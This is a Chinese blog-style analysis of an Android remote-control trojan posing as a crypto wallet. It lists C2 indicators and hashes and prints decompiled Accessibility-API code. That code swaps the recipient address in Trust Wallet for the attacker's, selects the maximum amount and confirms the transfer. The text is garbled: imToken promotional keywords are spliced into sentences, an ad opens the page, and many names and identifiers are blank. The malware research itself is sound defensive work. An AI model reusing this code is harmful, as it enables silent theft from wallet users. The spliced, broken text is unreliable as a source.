imToken 是一款全球领先的区块链数字资产管理工具[ZB],帮助你安全管理BTC, ETH, ATOM, EOS, TRX, CKB, BCH, LTC, DOT, KSM, FIL, XTZ 资产,同时支持去中心化币币兑换功能 ...
前言
本文将简单分析一个利用远程控制工具生成的伪装成加密钱包的样本(又称“)。随着开源软件的广泛使用,相关的远程控制工具也在一些开源网站上被公开。目前存在大量的远程控制软件,这些软件不断被利用,并且变种数量随着时间的推移而不断增加。截至2024年imToken官网,相关安全研究公司发布的报告显示,各类远程控制恶意软件激增,尤其是在金融行业,遭受的攻击比以往任何时候都要多。
1. 流行的遥控器
首先我们需要对变种有个简单的了解,变种恶意软件的生成和传播,通常是攻击者为了绕过检测机制、增强功能、针对不同的目标或环境、利用新发现的漏洞等目的而进行的,就像你做了一个大的改动,改变了通信流量或者某些功能等等。很多时候不仅仅是了解相关主体发布的恶意APK,更多的是了解主体发布后的APK的变化或者功能是否涵盖了更具威胁性的功能?
史密斯探员
2. 联系方式
它于 2016 年中期首次在恶意软件论坛上曝光。它与和类似,并具有多种远程控制和监控功能。它可以自我更新、下载和安装新应用程序、查看短信、获取设备的 GPS 位置、记录和监听设备的麦克风、访问摄像头、监听和拨打电话、获取联系人列表以及访问设备的技术详细信息(例如设备 IMEI 号码、WiFi MAC 地址和运营商信息)。
该恶意软件的发布进一步增强了威胁,它允许攻击者构建自定义远程控制版本并配置其命令和控制 (C2) 服务器进行通信。这种灵活性使其对网络犯罪分子非常有吸引力,尽管迄今为止它尚未在主动攻击中得到广泛使用。然而,由于构建工具是免费的,变体继续在免费条件下出现。
此次攻击常见于金融、水利、电力等行业,我个人没有查找更早的更多威胁数据,因为很难找到时间线,根据公开报道,捕获到的早期攻击样本如下:
1. 未知组织 2017 年 1 月 - 虚假应用程序
2. APT 组织 - 组织 -
在本章中我们披露了相关远程控制软件释放的恶意程序,但尚未披露攻击方法。
SpyNote android malware 213.227.140.35, the IP address of defender-update\.com, has also served as the command and control server for SpyNote, an off-the-shelf mobile rat. client.apk MD5 2820c84cf9f34fe999da0bcedea6915d SHA-1 0f3ae5c85151686b836fd95e2d680201679101e9 SHA-256 9727b56953bb6622cc1d3a039e2ebf6ef260dd76c8dcc11f4a1320fbf294621d 102.apk MD5 27aaf0e49ebc240933ea5d1a04747977 SHA-1 c7e7ad6d763a41b8d3d7d9301acbe53674041d75 SHA-256 d7bebfd87066e34d2f68ddf39d5637afa978df72bceb8dc690ed1553cdfffa43
1. 已捕获并正在使用的组织(团体)
(APT34、Helix、)
吉普赛 (IRN2, ATK40, G0049)
榛子 (, TA452)
2. 功能
本文介绍的是V5.0图形化工具远程管理手机教程(图文教程+演示视频),有兴趣的可以自行研究复现整个过程,这里就不一一演示了。
【界面】
[查看功能:连接日志、黑名单、监控、服务状态]
[工具功能:文件夹、命令、防火墙、测试连接、受害者设置]
【- 这里有介绍相关功能的视频】
目前国外已经有相关工具被修改并商业化,两种工具的价格也有所不同,不同的价格意味着恶意样本的功能权限也不同!
在这个页面上,该网站还介绍了该恶意样本可以获取:通话记录、屏幕监控、联系人信息、GPS定位、终端、短信、文件管理、摄像头管理,至少我们见证了这款商用远程控制能力还不错!
3. 加密钱包样本分析
发现伪装的加密钱包后,通过正常安装方式安装并运行样本。
加密钱包应用有一个应用权限列表。如果你按照普通应用,应用会在安装过程中提示你,说明需要授予哪些功能权限。这是比较常见的。
安装成功后,当你打开伪装成钱包的恶意应用程序时,界面会使用辅助功能服务请求进入下载服务,并要求你开启一些特定的权限。
关于此恶意样本对无障碍服务API的滥用,在开启无障碍服务后,应用通过代码中的I来请求权限,具体代码展示了如何引用请求的权限,并通过如下代码实现权限请求。
这是请求权限的主要方法。在下面的所有搜索结果中查找此方法被调用的实例:
该类继承自 并实现了 中的一系列回调方法,以允许与 进行交互。以下是与权限请求相关的方法:
整个过程已经把权限打开了,然后返回就是跳转到官网,这部分可能就是正常的参考,这部分还是有些疑问,如果用国外网络打开这个程序,不知道会不会有其他结果,这个没有测试过,返回源代码
如果你遵循整个过程并且没有任何问题,则会在源代码中找到一个覆盖层。以下代码可以识别合法加密钱包的使用情况并在其上显示覆盖层。
覆盖代码,注入的覆盖由,,其中 HTML 是硬编码的。
解码后看起来像这样
页面还有网络地址!通常如果是掩饰隐藏手段,很有可能会利用掩饰层盗取受害者资产。在微页面中可以看到两个地址,一个是发送地址,一个是目标地址。
盗窃过程
恶意代码利用 API 自动填写表单并将指定数量的加密货币转入攻击者的钱包地址。具体来说,代码执行以下任务:
1.读取并记录目标钱包地址(字段)。
2.读取并记录金额(字段)。
3.修改目标地址,将其替换为攻击者的加密货币钱包地址(.)。该地址由恶意软件与之通信的远程服务器发送。
4. 点击“最大金额”按钮()。此选项要求发送全部金额,而不是部分金额。
5. 单击下一步/继续按钮。
这些步骤允许恶意代码在用户不知情的情况下执行加密货币转移,将资金直接转移到攻击者控制的账户。
上图是利用 API 自动填写表单并转账,具体步骤如下:
流程一:读取目标钱包地址:
String str = "com.wallet.crypto.trustapp:id/input_value"; List list = this.val$context.getRootInActiveWindow().findAccessibilityNodeInfosByViewId(str); if (list.size() == 1) { Trust.access$102(list.get(0).getText().toString()); }
这段代码首先尝试从当前活动窗口中获取指定视图ID(com…/)对应的辅助功能节点信息,如果成功找到,且列表大小为1,则将节点的文本内容传递给Trust类的$102方法,这可能是目标钱包地址的字段。
第二个过程,读取金额:
list = this.val$context.getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.wallet.crypto.trustapp:id/input_general_amount"); if (list.size() == 1) { Trust.access$202(list.get(0).getText().toString()); }
类似地imtoken钱包安卓下载,代码尝试获取另一个视图ID(com.../)对应的辅助功能节点信息,并将其文本内容传递给Trust类的$202方法。这可能是转账金额的字段。
三个过程,将目标地址修改为攻击者的地址:
list = this.val$context.getRootInActiveWindow().findAccessibilityNodeInfosByViewId(str); if (list.size() == 1) { Bundle uBundle = new Bundle(); uBundle.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", initializeService.usdtadress); list.get(0).performAction(0x200000, uBundle); }
目前的代码再次使用目标钱包地址的视图ID来查找节点信息,然后将其文本内容替换为存储在中的恶意地址。这是通过对节点执行操作来实现的。
四个步骤——点击“最大值”按钮:
list = this.val$context.getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.wallet.crypto.trustapp:id/action_max"); int i = 16; if (list.size() == 1) { list.get(0).performAction(i); }
代码尝试找到“最大”按钮 (com.../) 的节点信息,并模拟单击该按钮以选择发送全部可用金额(最大金额)。
步骤5:点击“下一步”/“继续”按钮:
list = this.val$context.getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.wallet.crypto.trustapp:id/action_continue"); if (list.size() == 1) { list.get(0).performAction(i); }
最后,代码尝试找到“下一步”或“继续”按钮(com.../)的节点信息并模拟单击该按钮来确认或继续转移操作。
上述操作使得恶意样本可以在用户不知情的情况下自动完成加密货币转移过程,并在攻击者拥有足够权限的情况下将资金转移到攻击者控制的地址。
目前该恶意样本的核心是窃取受害者的资产,其余则是一些远程控制操作。
SHA-256 示例:
caac4681389b0af7998ba8fd2062d18050a0e5e8cb4c8d0006a1b3a921ee52c8
发表评论:
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。